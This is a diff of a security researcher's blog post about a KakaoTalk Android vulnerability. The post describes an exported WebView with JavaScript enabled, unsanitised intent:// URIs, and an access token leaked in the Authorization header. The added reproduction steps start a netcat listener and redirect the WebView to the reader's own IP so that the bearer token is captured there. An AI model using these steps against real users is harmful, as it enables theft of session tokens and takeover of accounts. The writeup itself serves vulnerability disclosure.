stulle123/stulle123.github.io/content/posts/kakaotalk-account-takeover.md

 - It's exported and can be started with a deep link (e.g., `adb shell am start kakaotalk://buy`)
 - It has JavaScript enabled (`settings.setJavaScriptEnabled(true);`)
-- It supports the `intent://` [scheme](https://www.mbsd.jp/Whitepaper/IntentScheme.pdf) to send data to other (non-exported) app components via JavaScript.
+- It supports the `intent://` [scheme](https://www.mbsd.jp/Whitepaper/IntentScheme.pdf) to send data to other **non-exported** app components via JavaScript.
 For example, the URI `"intent:#Intent;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity;S.EXTRA_URL=https://foo.bar;end"` loads the website `https://foo.bar` in the `MyProfileSettingsActivity` WebView.
 - There's no sanitization of `intent://` URIs (e.g., the `Component` or `Selector` is **not** set to `null`).
 So, potentially any app component can be accessed.

+Additionally, it leaks an access token in the `Authorization` HTTP header.
+Here's a simple way to reproduce this behavior:

+- Start a Netcat listener in a terminal window: `$ nc -l 5555`
+- Run `$ adb shell am start kakaotalk://buy` to start the `CommerceBuyActivity` WebView
+- Since `WebView.setWebContentsDebuggingEnabled(true);` you can use `chrome://inspect` in Chrome to debug it
+- Go to the `Console` tab and enter `document.location="http://<your-IP-address>:5555/";`
+- You should see a GET request and the `Authorization` header

-This means that if we find a way to run our own JavaScript inside the `CommerceBuyActivity` we would have the ability to start arbitrary (non-exported) app components when the user clicks on a malicious `kakaotalk://buy` deep link.
+This means that if we find a way to run our own JavaScript inside the `CommerceBuyActivity` we would have the ability to steal the user's access token and to start arbitrary app components when the user clicks on a malicious `kakaotalk://buy` deep link.

 Unfortunately, we can't load arbitrary attacker-controlled URLs as there is some validation going on: